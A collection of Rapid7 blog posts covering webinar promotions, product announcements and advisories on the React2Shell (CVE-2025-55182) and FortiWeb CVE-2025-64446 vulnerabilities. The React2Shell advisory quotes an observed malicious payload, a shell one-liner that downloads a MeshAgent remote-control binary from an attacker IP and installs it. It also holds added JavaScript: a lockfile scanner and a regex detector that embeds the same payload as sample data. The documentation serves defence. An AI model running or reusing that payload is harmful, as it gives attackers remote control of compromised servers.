
Voices of the Experts: What to Expect from Our Predictions Webinar

5 December 2025 at 09:02

Every year, Rapid7 brings together some of the most experienced minds in cybersecurity to pause, zoom out, and take stock of where the threat landscape is heading. Last year's predictions webinar sparked lively debate among practitioners, leaders, and researchers alike, and many of those early warnings were proven accurate.

We talked about expanding attack surfaces, the acceleration of zero-day exploitation, and the shifting role of SecOps teams navigating unpredictable regulatory and operational pressure. We explored how AI was beginning to shape attacker behavior and how defenders could prepare for a world where speed and context matter more than ever. Looking back, the real takeaway was not just the predictions themselves. It was how quickly the landscape shifted around them.

This year's predictions webinar builds on that momentum. The conversation feels different now. Threat actors have adapted. Business environments have tightened. Defenders are operating with more constraints and higher expectations than at any point in recent memory. That is exactly why our experts are once again stepping up to share what they are seeing, what is keeping them curious, and what they believe security teams should be paying closer attention to as we head into 2026.

A panel shaped by diverse vantage points

One of the strengths of this session is the range of perspectives represented on the panel.

Philip Ingram, Former Senior Military Intelligence Officer at Grey Hare Media, brings a global geopolitical lens that connects cyber activity with real-world tensions and state-aligned movements. His vantage point helps translate complex geopolitical signals into practical considerations for security teams.

Raj Samani, SVP and Chief Scientist at Rapid7, offers deep insight into attacker behavior, AI-driven disruption, and the evolving threat landscape. His work tracking threat actor tradecraft and the mechanics of cybercrime economies gives him a unique perspective on how attacks scale and shift over time.

Sabeen Malik, VP of Global Government Affairs and Public Policy at Rapid7, brings a policy and regulatory perspective that is essential for understanding how global mandates and governance trends influence security operations. Her insights shed light on the intersection of cyber risk, legislative pressure, and organizational responsibility.

Together, they create a multi-dimensional picture of what is coming next. Not hype. Not speculation. Instead, grounded observations from experts who see attacker behavior unfold from very different angles.

What we learned from last year

Last year's session made one thing clear: the forces shaping cyber risk are not isolated. They are interconnected, and they are accelerating.

We saw that:

  • Attackers were closing the gap between vulnerability disclosure and exploitation.

  • Identity-based compromise continued to outpace traditional malware.

  • Economic and operational pressures made it harder for security teams to keep up.

  • Global events had tangible ripple effects on what attackers chose to target next.

Those insights helped set a realistic direction for 2025. Only twelve months later, the ground has shifted again. AI-assisted exploitation, insider-driven breaches, geopolitical instability, and expanding exposure surfaces are changing both attacker priorities and defender responsibilities.

This webinar is not a rehash. It is a recalibration, grounded in what is actually happening across the threat landscape right now.

Themes our experts will explore

While the predictions themselves will be revealed live during the session, we can share a few of the themes shaping this year's discussion.

  • How global tensions are redefining cyber risk for private organizations, even those far from the front lines

  • Why identity, behavior, and access are becoming the most reliable early indicators of compromise

  • Where AI is helping and hurting defenders, and how attackers are using automation and tooling to accelerate the earliest stages of intrusion

  • Why context and prioritization are becoming essential as vulnerability volumes and exploitation speeds continue to rise

  • How security teams can get ahead of exposure, not just react to it, through more integrated and risk-aware workflows

These are not abstract conversations. They reflect the real operational and strategic challenges security teams face every day.

Why you will not want to miss it

Whether you are leading a security program or defending in the trenches, this session will help you:

  • Understand the forces shaping attacker strategy

  • Identify the signals that matter most for early detection

  • Anticipate the operational pressures teams will face in 2026

  • Prioritize investments, workflows, and practices that support resilience

You will walk away with a clearer sense of where to focus, what to watch for, and how to prepare your team for what comes next, without getting lost in noise or speculation.

Join the conversation

This webinar is one of our most anticipated sessions of the year. If you have not registered yet, now is the perfect time to save your spot and hear directly from the experts shaping the conversation around what 2026 will look like for security teams everywhere.

Register here

React2Shell (CVE-2025-55182) - Critical unauthenticated RCE affecting React Server Components

4 December 2025 at 11:05

Overview

Update #1: As of 4:30 PM Eastern, December 4, 2025, Rapid7 has validated that a working weaponized proof-of-concept exploit, shared by researcher @maple3142, is now publicly available.

Update #2: On December 5, 2025, Lachlan Davidson, who discovered the vulnerability, also published a proof-of-concept. A Metasploit exploit module is also available.

Update #3: At 10:00 AM Eastern, December 5, 2025, CVE-2025-55182 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), confirming exploitation in-the-wild has begun.

On December 3, 2025, Meta disclosed a new vulnerability, CVE-2025-55182, which has since been dubbed React2Shell. A second CVE identifier, CVE-2025-66478, was assigned and published to track the vulnerability in the context of Next.js. However, this second CVE has since been rejected as a duplicate of CVE-2025-55182, as the root cause in all cases is the same and should be referred to with a single common CVE identifier.

CVE-2025-55182 is a critical unauthenticated remote code execution vulnerability affecting React, a very popular library for building modern web applications. This new vulnerability has a CVSS rating of 10.0, which is the maximum rating possible and indicates the highly critical nature of the issue. Successful exploitation of CVE-2025-55182 allows a remote unauthenticated attacker to execute arbitrary code on an affected server via malicious HTTP requests.

The vulnerability affects React applications that support React Server Components. Server applications that support React Server Components may be vulnerable even if they do not explicitly implement any React Server Function endpoints. Additionally, many popular frameworks based on React, such as Next.js, are also affected by this vulnerability.

A separate advisory was published by Vercel, the vendor for Next.js. This advisory tracks the impact of CVE-2025-55182 as it applies to the Next.js framework, and provides information for Next.js users to remediate the issue.

As of this blog’s publication on December 4, 2025, there is no known public exploit code available. Several exploits have been published claiming to exploit CVE-2025-55182; however, they have not been successfully verified as actually exploiting this vulnerability. This has been noted in the original finder’s website, react2shell.com. Although broad exploitation has not yet begun, we expect this to quickly change once a viable public exploit becomes available.

Organizations that use React or the affected downstream frameworks are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles and before broad exploitation begins.

Mitigation guidance

CVE-2025-55182 affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following React packages:

A vendor-supplied update for the above packages is available in versions 19.0.1, 19.1.2, and 19.2.1. Users of affected React packages are advised to update to the latest remediated version on an urgent basis.

Downstream frameworks that depend on React are also affected; this includes (but is not limited to):

For the latest mitigation guidance for React, please refer to the React security advisory. For the latest mitigation guidance specific to Next.js, please refer to the Vercel security advisory.
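As an added example, not Rapid7's code or the React project's own tooling, the following Node script scans a parsed package-lock.json for copies of the React Server Components packages inside the affected version ranges stated above, including nested copies that a top-level upgrade can miss. The package names are an assumption taken from the React advisory (this post elides the list), and the lockfile format assumed is npm lockfileVersion 2 or 3.

```javascript
// Added example (not Rapid7's or the React project's code): scan a parsed
// package-lock.json (lockfileVersion 2 or 3) for copies of the React Server
// Components packages at versions affected by CVE-2025-55182.
//
// ASSUMPTION: the package names below come from the React advisory, not from
// this post, which elides the list; confirm them against the React advisory.
const RSC_PACKAGES = new Set([
  'react-server-dom-webpack',
  'react-server-dom-parcel',
  'react-server-dom-turbopack',
]);

// First fixed patch release per 19.x minor line, as stated in the post:
// 19.0.1, 19.1.2 and 19.2.1. Minor lines not listed are not in the affected set.
const FIRST_FIXED_PATCH = { 0: 1, 1: 2, 2: 1 };

// Parse "19.2.0", "v19.2.0" or "19.2.0-canary-..." into numeric parts;
// returns null for anything that is not semver-like.
function parseVersion(version) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(version).trim());
  return m ? { major: +m[1], minor: +m[2], patch: +m[3] } : null;
}

// True when the version is below the first fixed release of its minor line.
function isAffectedVersion(version) {
  const p = parseVersion(version);
  if (!p || p.major !== 19) return false;
  const firstFixed = FIRST_FIXED_PATCH[p.minor];
  return firstFixed !== undefined && p.patch < firstFixed;
}

// Lockfile keys look like "node_modules/<name>" for top-level packages and
// "node_modules/<parent>/node_modules/<name>" for nested copies; the segment
// after the last "node_modules/" is the package name (scoped names included).
function packageNameFromLockKey(key) {
  const idx = key.lastIndexOf('node_modules/');
  return idx === -1 ? null : key.slice(idx + 'node_modules/'.length);
}

// Return every affected copy, nested ones included, with its lockfile path.
function findVulnerableReactPackages(lock) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const name = packageNameFromLockKey(key);
    if (!name || !RSC_PACKAGES.has(name) || !meta || !meta.version) continue;
    if (isAffectedVersion(meta.version)) {
      findings.push({ path: key, name, version: meta.version });
    }
  }
  return findings;
}

// Constructed sample lockfile: one fixed top-level copy, one affected nested
// copy pulled in by a framework, and one affected top-level copy.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app' },
    'node_modules/react-server-dom-webpack': { version: '19.2.1' },
    'node_modules/some-framework/node_modules/react-server-dom-webpack': { version: '19.1.1' },
    'node_modules/react-server-dom-turbopack': { version: '19.0.0' },
  },
};

// Usage: list affected copies so the nested one is not overlooked.
for (const f of findVulnerableReactPackages(SAMPLE_LOCK)) {
  console.log(`${f.name}@${f.version} at ${f.path} is affected by CVE-2025-55182`);
}
```

On a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))` to `findVulnerableReactPackages` and treat any finding, nested or not, as requiring the update described above.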

Rapid7 customers

Exposure Command, InsightVM and Nexpose

An unauthenticated check for CVE-2025-55182 has been available to Exposure Command, InsightVM and Nexpose customers since the December 4 content release. Note that the first iteration of the check was a "potential" type check, which was revised to a normal (non-potential) remote check on Friday, December 5.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-55182, including indicators of compromise (IOCs), Yara and Sigma rules.

Observed exploitation

As of December 8, 2025, Rapid7 honeypots have observed exploitation attempts of CVE-2025-55182 using the same RCE technique as the PoC published on December 4, 2025. While the exploit attempts seen on our honeypots match the RCE technique from that original PoC, the actual payloads being delivered (i.e. what the attackers are trying to execute on a compromised server) are now different and show malicious intent.

One such example we are seeing is the deployment of MeshAgent remote control software, which, if successful, allows an attacker to remotely control newly compromised systems from a centralized location. The decoded malicious payload command can be seen here:

[ "$EUID" -eq 0 ] && URL="https://156.67.221.96/meshagents?id=hrfDDhB%40yNf4oBrCH%40R%24KfVp27XfA78LiX%40IZUxoTgs3zCwG%24bjdpR%400oa8%40BhTf&installflags=0&meshinstall=6" || URL="https://156.67.221.96/meshagents?id=yGNhrz51DRyitgqtVyaSjJU3GsIKSJpCfD5aQ%24QPcbjBXNVeFkiZg1LAmWYOQyP4&installflags=0&meshinstall=6"; wget -O /tmp/meshagent --no-check-certificate "$URL" && chmod +x /tmp/meshagent && cd /tmp/ && ([ "$EUID" -eq 0 ] && ./meshagent -install || ./meshagent -connect)

The behavior of this payload is shown below.

[Figure: behavior of the MeshAgent payload]
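As an added example, not part of Rapid7's detection content, the following Node script scores process command lines for the MeshAgent deployment pattern in the decoded payload above and matches the download host against the IP listed in this post's IOC section. Rule weights, the alert threshold and the sample telemetry events are assumptions constructed for the example.

```javascript
// Added example (not Rapid7's detection content): a heuristic detector for the
// MeshAgent deployment pattern described above, meant to run over process
// command lines from EDR or auditd telemetry. Weights and threshold are assumptions.
const KNOWN_HOSTS = new Set(['156.67.221.96']); // the IP in this post's IOC list

// Each rule is a regex over the raw command line with a weight. Most rules are
// benign on their own (admins do write to /tmp), so only the combination alerts.
const MESHAGENT_RULES = [
  { name: 'meshagents_download_path', re: /\/meshagents\?/i, weight: 3 },
  { name: 'mesh_install_query_params', re: /[?&](meshinstall|installflags)=/i, weight: 2 },
  { name: 'tls_verification_disabled', re: /--no-check-certificate|--insecure|\bcurl\b[^|;&]*\s-k\b/, weight: 1 },
  { name: 'download_to_tmp', re: /-O\s+\/tmp\/\S+|>\s*\/tmp\/\S+/, weight: 1 },
  { name: 'chmod_exec_in_tmp', re: /chmod\s+\+x\s+\/tmp\/\S+/, weight: 1 },
  { name: 'meshagent_install_or_connect', re: /\.\/meshagent\s+-(install|connect)\b/, weight: 3 },
  { name: 'root_branching_on_euid', re: /\$EUID"?\s+-eq\s+0/, weight: 1 },
];

const ALERT_THRESHOLD = 5; // assumption: tune against your own baseline

// First http(s) host in the command line, or null. Note this only works when the
// URL and the download command appear in the same logged command line.
function extractDownloadHost(cmdline) {
  const m = /https?:\/\/([^\/\s"']+)/i.exec(cmdline);
  return m ? m[1] : null;
}

// Score one command line and report which rules fired.
function analyzeCommandLine(cmdline) {
  const fired = MESHAGENT_RULES.filter((r) => r.re.test(cmdline));
  const score = fired.reduce((sum, r) => sum + r.weight, 0);
  const host = extractDownloadHost(cmdline);
  const knownIoc = host !== null && KNOWN_HOSTS.has(host);
  return {
    score,
    matched: fired.map((r) => r.name),
    host,
    knownIoc,
    alert: knownIoc || score >= ALERT_THRESHOLD,
  };
}

// Run over a batch of telemetry events and keep only the ones worth an alert.
function findMeshAgentDrops(events) {
  return events
    .map((e) => ({ ...e, result: analyzeCommandLine(e.cmdline) }))
    .filter((e) => e.result.alert);
}

// Constructed sample events. The first cmdline is the decoded payload quoted
// above; the other two are benign look-alikes that should not alert.
const SAMPLE_EVENTS = [
  {
    ts: '2025-12-08T03:14:07Z', host: 'web-01', parent: 'node',
    cmdline: '[ "$EUID" -eq 0 ] && URL="https://156.67.221.96/meshagents?id=hrfDDhB%40yNf4oBrCH%40R%24KfVp27XfA78LiX%40IZUxoTgs3zCwG%24bjdpR%400oa8%40BhTf&installflags=0&meshinstall=6" || URL="https://156.67.221.96/meshagents?id=yGNhrz51DRyitgqtVyaSjJU3GsIKSJpCfD5aQ%24QPcbjBXNVeFkiZg1LAmWYOQyP4&installflags=0&meshinstall=6"; wget -O /tmp/meshagent --no-check-certificate "$URL" && chmod +x /tmp/meshagent && cd /tmp/ && ([ "$EUID" -eq 0 ] && ./meshagent -install || ./meshagent -connect)',
  },
  {
    ts: '2025-12-08T03:20:11Z', host: 'build-02', parent: 'bash',
    cmdline: 'wget -O /tmp/node.tar.xz https://nodejs.org/dist/v20.18.0/node-v20.18.0-linux-x64.tar.xz',
  },
  {
    ts: '2025-12-08T04:02:39Z', host: 'jump-01', parent: 'sshd',
    cmdline: 'cd /opt/meshagent && ./meshagent -install',
  },
];

for (const e of findMeshAgentDrops(SAMPLE_EVENTS)) {
  console.log(`${e.ts} ${e.host}: score=${e.result.score} host=${e.result.host} rules=${e.result.matched.join(',')}`);
}
```

A web-server worker such as a `node` process spawning a shell that downloads and installs a remote-control agent is the combination to key on; a single rule firing on its own is expected noise.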

Indicators of compromise (IOCs)

IP Addresses

  • 156.67.221[.]96

Updates

  • December 4, 2025: Several minor edits for punctuation and grammar.
  • December 4, 2025: Coverage availability for Rapid7 customers.
  • December 4, 2025: PoC validation updated.
  • December 5, 2025: The original finder has also published their PoC. A Metasploit exploit is available.
  • December 5, 2025: Added reference to CISA KEV.
  • December 8, 2025: Updated coverage information.
  • December 8, 2025: Added Intelligence Hub coverage to the Rapid7 customers section. Added an Observed exploitation section.

From Policy to Practice: Why Cyber Resilience Needs a Reboot

4 December 2025 at 09:00

In cybersecurity today, regulation is everywhere, but resilience isn’t keeping pace.

In this episode of Experts on Experts: Commanding Perspectives, Craig Adams chats with Sabeen Malik, VP of Public Policy & Government Affairs at Rapid7, about what’s broken (and what’s promising) in today’s regulatory landscape.

Sabeen pulls from her experience across diplomacy, operations, and government relations to highlight where policy too often fails to account for how risk actually works. From insider threats to government shutdowns, it’s a sharp, timely look at how security leaders should approach strategy, structure, and compliance going into 2026.

Key themes:

  • The growing trust gap between public, private, and institutional actors

  • Why insider threats are a cultural problem, not just a controls one

  • Where UK and US guidance is falling short on resilience

  • What small and midsized businesses are still missing

  • Why AI, exposure, and threat governance need to be connected

Whether you're thinking about AI use cases or modern regulation fatigue, this episode offers a much-needed reset.

Watch the full video.

Announcing Rapid7’s Next-Gen SIEM Buyer’s Guide

2 December 2025 at 14:38

AI dominates headlines, yet one cornerstone of security operations keeps evolving to meet today’s threats. Security Information and Event Management (SIEM) has come a long way from basic logging. Modern platforms unify threat detection, investigation, and response with automation, context, and AI, so analysts can act faster and with confidence. That is the focus of our new Next-gen SIEM Buyer’s Guide.

Why this guide now

Many teams are still wrestling with legacy SIEMs that were built for storage and compliance, not for today’s hybrid environments or AI-enabled adversaries. The market is crowded and the language is inconsistent, which makes evaluation tough. This guide cuts through the noise with a practical definition of next-gen SIEM and a clear set of evaluation criteria grounded in outcomes, not buzzwords. It explains how a SIEM should help you see more, decide faster, and respond with precision, by pairing analytics with automation and exposure context.

In this guide you will learn the core capabilities that define a next-gen SIEM, including high-fidelity data ingestion, curated detections, AI-assisted triage, automation, and integrated exposure context. Next, you’ll better understand how to assess platforms for usability, scalability, and total cost of ownership without sacrificing effectiveness. Finally, we will offer some questions to ask vendors so you can separate claims from proof and align the solution to your team’s workflows and maturity. The guide also highlights where SIEM sits alongside adjacent tools and why data quality, context, and integrated workflows matter more than feature lists.

Who should read it

Security leaders and practitioners who are evaluating SIEMs, planning a modernization, or looking to improve analyst efficiency and overall SOC performance will find practical guidance they can use in vendor conversations and internal planning. If your goals include reducing false positives, accelerating investigation and response, and tying detections to business risk, this guide will help you level set your needs with the right requirements.

How Rapid7 approaches next-gen SIEM

Rapid7’s approach brings detection and response together in a single, streamlined experience that helps analysts identify, investigate, and contain threats faster. Rapid7’s next-gen SIEM delivers curated detections mapped to attacker behavior, reducing false positives and surfacing high-priority alerts with clear context. Integrated investigation and response workflows guide analysts from alert to action within one interface, linking threat intelligence, identity, and asset data to drive faster, more confident decisions. Built on the Rapid7 Command Platform, this unified approach consolidates visibility across endpoints, networks, cloud, and SaaS environments, enabling coordinated detection and response without tool sprawl.

Get the guide

Download Rapid7’s Next-Gen SIEM Buyer’s Guide to learn how to evaluate platforms that deliver measurable detection and response outcomes, not just more data. If you want to see how these principles show up in the product, explore the Rapid7 Command Platform.

Onboard at Cloud Speed with Rapid7 and AWS IAM Delegation

20 November 2025 at 08:35

Every great product experience starts with a smooth beginning. But in the world of cloud security, onboarding can sometimes feel like an obstacle course. Detailed fine-grained Identity and Access Management (IAM) configurations, lengthy deployment steps, and manual permission setups can turn what should be an exciting first impression into a tedious chore.

That’s changing. Rapid7 has enhanced the onboarding experience for Exposure Command and InsightCloudSec by integrating with AWS IAM temporary delegation - a new AWS capability that lets customers approve deployment access directly in the AWS console. The result? A faster, simpler, and more secure path to getting up and running in the cloud.

Why onboarding matters - and why it often fails

The first minutes with a new platform matter. It’s the difference between “this is amazing” and “I’ll come back to it later.”

In cloud environments, setup usually involves multiple AWS services - compute, storage, networking, access management - all of which must be configured precisely to maintain security. Traditionally, customers have had to manually create IAM roles, adjust trust relationships, and fine-tune permissions just to let a partner solution like Rapid7 deploy resources.

It’s not just time-consuming; it’s error-prone. Misconfigured roles can cause deployment failures or unnecessary security risk. Support teams spend hours walking customers through the process, and the friction delays time-to-value. When scaling across dozens or hundreds of AWS accounts, those delays multiply fast.

Meet AWS IAM temporary delegation: What it is and why it matters

AWS IAM temporary delegation simplifies the entire setup journey. It allows trusted partners like Rapid7 to automate deployment securely - but only after the customer grants explicit, time-bound approval.

Here’s how it works: When you initiate onboarding from within Rapid7’s interface, you’re redirected to the AWS console. There, you can review the exact permissions Rapid7 is requesting and how long access will last. Once approved, AWS provides Rapid7 with temporary credentials to complete the setup. After the time window expires, that access ends automatically.

No long-term IAM keys, no manual role creation, and no guesswork. Customers stay in control, with full visibility and auditability. It’s automation with accountability built in.

How Rapid7 is putting this into action

With the latest release, Rapid7 has integrated this capability directly into Exposure Command and InsightCloudSec, creating a guided onboarding experience that happens almost entirely inside the Rapid7 interface.

Here’s the new flow:

  1. Customers configure deployment options in Rapid7’s InsightCloudSec environment.
  2. A temporary delegation request appears via an AWS console pop-up.
  3. An authorized AWS user reviews and approves the request.
  4. Rapid7 automatically deploys the necessary resources on the customer’s behalf.

This streamlined workflow eliminates dozens of manual steps and reduces onboarding time from hours to minutes. It’s faster, simpler, and still fully aligned with AWS’s strict security model.

Speed, simplicity, and security

This integration hits the sweet spot between automation and trust:

  • Speed: Customers can start realizing value from Rapid7’s cloud security solutions in minutes instead of days.

  • Simplicity: The UI-driven process means no wrestling with IAM policies or JSON templates.

  • Security: Access is temporary and permission-scoped. Customers retain complete oversight through the AWS console and CloudTrail logs.

For organizations with compliance or security governance requirements, this is the ideal balance: operational efficiency without compromising control.

Beyond onboarding: What this says about Rapid7 and AWS alignment

This update isn’t just about faster onboarding. It’s a glimpse into Rapid7’s broader partnership with AWS. Rapid7 has long been an AWS Advanced Tier Partner, building integrations that help customers manage security across cloud-native environments. From leveraging AWS telemetry in MXDR to integrating with AWS services like CloudTrail and GuardDuty, Rapid7’s platform has been designed to meet customers where they already operate within AWS.

By adopting AWS IAM temporary delegation early, Rapid7 reinforces its commitment to cloud-first innovation and shared responsibility principles. Customers get the assurance that their onboarding, deployment, and operations all align with AWS security best practices.

What this means for customers

If you’re deploying Rapid7 Exposure Command (Advanced or Ultimate) or InsightCloudSec on AWS, here’s what to expect:

  • A guided onboarding experience that automates AWS resource setup.
  • A faster, less error-prone workflow that still keeps you in control.
  • The ability for authorized users to approve temporary access requests directly in the AWS console.

Before onboarding, make sure someone in your organization has the permissions to approve delegation requests. After deployment, review your CloudTrail logs as part of normal governance; you’ll see every action logged and time-bounded.

Value from day one

Onboarding shouldn’t be a hurdle. And now with AWS IAM Temporary Delegation and Rapid7’s enhanced experience, it no longer is. Together, AWS and Rapid7 have reimagined what “getting started” looks like in the cloud - faster, more intuitive, and just as secure as you need it to be.

It’s one more way Rapid7 is helping organizations unlock value from day one, while staying aligned with AWS’s best practices for identity, access, and automation.

See how easy secure onboarding can be. Explore Rapid7’s listings for Exposure Command and InsightCloudSec straight from the AWS Marketplace.

Introducing Rapid7 Curated Intelligence Rules for AWS Network Firewall

19 November 2025 at 15:46

Outsmart attackers with smarter rules

Managing network security in a dynamic cloud environment is a constant challenge. As traffic volume grows and threat actors evolve their tactics, organizations need protection that can scale effortlessly while delivering robust, intelligent defense. That's where a service like AWS Network Firewall becomes essential, and we’re excited to partner with AWS to make it even more powerful.

What is AWS Network Firewall?

AWS Network Firewall (AWS NWF) is a managed service that provides essential, auto-scaling network protections for Amazon Virtual Private Clouds (VPCs). While its flexible rules engine offers granular control, defining and maintaining the right rules to defend against evolving threats is a complex and resource-intensive task.

Manually creating and updating rules often leads to coverage gaps and creates significant operational overhead. To simplify this process and empower teams to act with confidence, Rapid7 is proud to announce the availability of Curated Intelligence Rules for AWS Network Firewall. As an AWS partner, we convert our curated intelligence on Indicators of Compromise (IOCs) into high-quality rule groups, delivering expert-vetted threat intelligence directly within your native AWS experience.

Harnessing industry-leading threat intelligence

In the world of threat intelligence, more isn’t always better. Too many low-fidelity alerts generate noise, distract analysts, and leave teams chasing false positives. At Rapid7, our approach is different. We focus on delivering high-fidelity intelligence, enabling customers to zero in on the threats most relevant to their unique environments. 

Rapid7 Curated Intelligence Rules embody this same approach, and are built on three key principles:

  • Focus on quality over quantity: Rules emphasize meaningful, low-noise detection directly aligned with current, real-world threats, significantly reducing alert fatigue.

  • Curated global intelligence: Rule sets are powered by high-quality, region-specific data from unique sources, providing unparalleled visibility and context for actionable detections.

  • Dynamic and self-cleaning rule sets: Threat intelligence is not static. Using Rapid7’s proprietary Decay Scoring system, rules are automatically retired when an IOC passes a certain threshold, ensuring the delivered intelligence is always fresh, relevant, and current.

We’re launching with two distinct rule sets, each designed to address today’s most pressing threats:

  • Advanced Persistent Threat (APT) campaigns: Targets the subtle and persistent techniques used by state-sponsored and sophisticated threat actors.

  • Ransomware & cybercrime: Focuses on the tools, infrastructure, and indicators associated with financially motivated attacks.

These rule sets are updated daily to ensure you have the most current protections. Furthermore, our intelligence is dynamic. When an IOC passes a certain threshold in our proprietary Decay Scoring system, we remove it from the rule set. This process guarantees that the intelligence you receive is always current and actionable, significantly reducing alert fatigue.

The operational advantage

These Curated Intelligence Rules deliver immediate and tangible value, allowing your team to:

  • Automate threat protection: Reduce overhead with curated, continuously updated detections delivered natively within AWS Network Firewall.

  • Adopt protections faster: Deploy protections powered by Rapid7 Labs intelligence with just a few clicks in the console.

  • Maintain predictable operations: Rely on AWS-validated updates, clear rule group metadata, and transparent per-GB metering.

Common use cases addressed

Our rule sets provide practical defense against a wide range of attack scenarios. You can:

  • Block command and control (C2) communication from known malware families

  • Detect network reconnaissance activity associated with advanced persistent threats

  • Prevent data exfiltration to malicious domains linked to cybercrime groups

  • Identify and stop the download of malware payloads from compromised websites

  • Alert on traffic to newly registered domains used in malicious activities

Get started with Curated Intelligence Rules for AWS NFW today

Ready to enhance your cloud security with curated, actionable intelligence? Add our rule sets to your AWS Network Firewall and strengthen your organization’s defenses in minutes.

Visit the listing in the AWS Marketplace to learn more.

The State of Security Today: Setting the Stage for 2026

18 November 2025 at 11:07

As we close out 2025, one thing is clear: the security landscape is evolving faster than most organizations can keep up. From surging ransomware campaigns and AI-enhanced phishing to data extortion, geopolitical fallout, and gaps in cyber readiness, the challenges facing security teams today are as varied as they are relentless. But with complexity comes clarity and insight.

This year’s most significant breaches, breakthroughs, and behavioral shifts provide a critical lens through which we can view what’s next. That’s exactly what we’ll explore in our upcoming Security Predictions for 2026 webinar, where Rapid7’s experts will break down where we are now, what to expect next, and how organizations can proactively adapt.

Before we look ahead, let’s take stock of what defined 2025 and what it tells us about the state of cybersecurity today.

Ransomware: Same playbook, more precision

Ransomware remains one of the most consistent and costly threats facing organisations today, but the approach has shifted. According to Rapid7’s Q3 2025 Threat Landscape Report, data extortion continues to dominate, with groups increasingly focused on exfiltration and disruption rather than encryption alone. Over 80% of ransomware cases handled in Q3 involved data theft, often staged and timed to maximise leverage.

Threat actors like RansomHub, BlackSuit, NoEscape, and Scattered Spider continue to refine their operations. Many campaigns are multi-stage and collaborative, with Initial Access Brokers providing footholds that are later sold to ransomware operators. One common thread is a focus on identity and infrastructure abuse - attackers are compromising vSphere environments, exploiting misconfigurations in third-party platforms, and abusing legitimate remote access tools to move laterally before launching extortion phases.

These incidents increasingly target complex organizations with sprawling digital footprints. The result? Weeks of operational downtime, lost revenue, regulatory scrutiny, and enduring brand damage. In this landscape, ransomware is no longer just a malware problem - it’s a business continuity issue, a supply chain risk, and a board-level concern.

The offense is automated: AI goes to work

This year, we saw AI break through hype and land firmly in attackers' toolkits. Tools like WormGPT, FraudGPT, and DarkBERT gave cybercriminals an entry point to generate convincing phishing emails, polymorphic malware, and credential-harvesting scripts, all without needing advanced coding skills.

In our AI Offense blog, we detailed how these tools lower the barrier to entry and amplify the volume and sophistication of social engineering campaigns. Pair that with deepfakes, cloned voices, and LLM-powered targeting, and security teams now face threats that are faster, cheaper, and harder to detect than ever before.

The takeaway? AI is not a future threat. It is here. And defenders must embrace its potential just as aggressively as attackers have.

The human factor: Still the weakest link

Despite improved tooling, attacker playbooks still rely heavily on people. Our recent exploration of evolving social engineering trends highlighted the rise of Microsoft Teams-based impersonation, remote access tool abuse such as Quick Assist, and multi-stage credential compromise.

The fallout has been widespread. From attacks on major UK retailers to multiple airline disruptions and critical public sector breaches, social engineering is no longer just email phishing. It is phone calls, voice cloning, fake calendars, and chat-based manipulation.

Training helps. But attackers are innovating faster than awareness campaigns can keep up. Security teams need to simulate these threats internally and invest in visibility across identity platforms, because credentials remain the crown jewels.

From awareness to action: Resilience as a mandate

A growing number of incidents in 2025 underscored the readiness gap in many organizations. Our recent blog on preparedness broke down the UK’s National Cyber Security Centre guidance urging companies to revisit their offline contingency planning, including printed IR protocols and analog communications in case digital systems are taken offline.

This call followed a sharp rise in high-impact events, with over 200 nationally significant cyber incidents recorded in the UK alone this year.

The lesson? Cyber resilience is not a nice to have. It is foundational. Detection, backup, and patching are essential, but so is building response plans that assume failure, simulate outages, and bring the entire business to the table.

Join us: Predicting what’s next in 2026

We’ll explore these trends and where they’re heading in much greater depth in our Security Predictions for 2026 webinar, taking place on December 10.

Rapid7’s experts will unpack:

  • Which attacker tactics are here to stay and which are on the rise

  • Where AI, regulation, and infrastructure gaps are creating new exposures

  • How defenders can better prioritise risk and operate in resource-constrained environments

  • What CISOs, SOC leaders, and engineers need to align on in 2026 to stay ahead

This is our biggest global webinar of the year, and it is designed to help security professionals at every level get proactive and stay ahead of what’s next.

Register now and join thousands of security professionals from around the world as we set the stage for 2026. Because when the threat landscape keeps shifting, your best defense is a head start.

CVE-2025-64446: Critical Vulnerability in Fortinet FortiWeb Exploited in the Wild

13 November 2025 at 16:36

Overview

On October 6, 2025, the cyber deception company Defused published a proof-of-concept exploit on social media that was captured by one of their Fortinet FortiWeb Manager honeypots. FortiWeb is a Web Application Firewall (WAF) product that is designed to detect and block malicious traffic to web applications. Exploitation of this new vulnerability, now tracked as CVE-2025-64446, allows an attacker with no existing level of access to gain administrator-level access to the FortiWeb Manager panel and websocket command-line interface. Rapid7 has tested the latest FortiWeb version 8.0.2 and observed that the existing public proof-of-concept exploit does not work. However, the exploit does work against earlier versions, including version 8.0.1, which was released in August 2025.

Based on the information circulated by Defused, this new vulnerability is claimed to have been exploited in the wild in October 2025. On November 14, 2025, Fortinet PSIRT published CVE-2025-64446 and an official advisory for the critical vulnerability, which holds a CVSS score of 9.1. Organizations running versions of Fortinet FortiWeb that are listed as affected in the advisory are advised to remediate this vulnerability on an emergency basis, given that exploitation has been occurring since October in targeted attacks, and broad exploitation will likely occur in the coming days. A Metasploit module for CVE-2025-64446 is available here, and security firm watchTowr has published a technical analysis. CISA's KEV catalog has been updated to include CVE-2025-64446.

It’s unclear whether the FortiWeb release cycle intentionally included a silent patch for this vulnerability or merely coincidentally included changes that broke the existing exploit.

On November 18, 2025, Fortinet published a new advisory for CVE-2025-58034. This new vulnerability is an authenticated command injection affecting FortiWeb. Fortinet has indicated CVE-2025-58034 has also been exploited in the wild, and CISA's KEV catalog has been updated to include this new vulnerability. It is not clear at this time if both CVE-2025-64446 and CVE-2025-58034 have been exploited in the wild together as an exploit chain.

This blog post will be updated as new developments arise.

Rapid7 observations

On November 6, 2025, Rapid7 Labs observed that an alleged zero-day exploit targeting FortiWeb was published for sale on a popular black hat forum. While it is not clear at this time if this is the same exploit as the one described above, the timing is coincidental.


Mitigation guidance

On November 14, 2025, Fortinet published an advisory that outlines remediation steps and workaround mitigations for CVE-2025-64446. According to Fortinet, the following versions are affected, and the fixed versions for each main release branch are also listed:

  • Versions 8.0.0 through 8.0.1 are vulnerable, 8.0.2 and above are fixed.
  • Versions 7.6.0 through 7.6.4 are vulnerable, 7.6.5 and above are fixed.
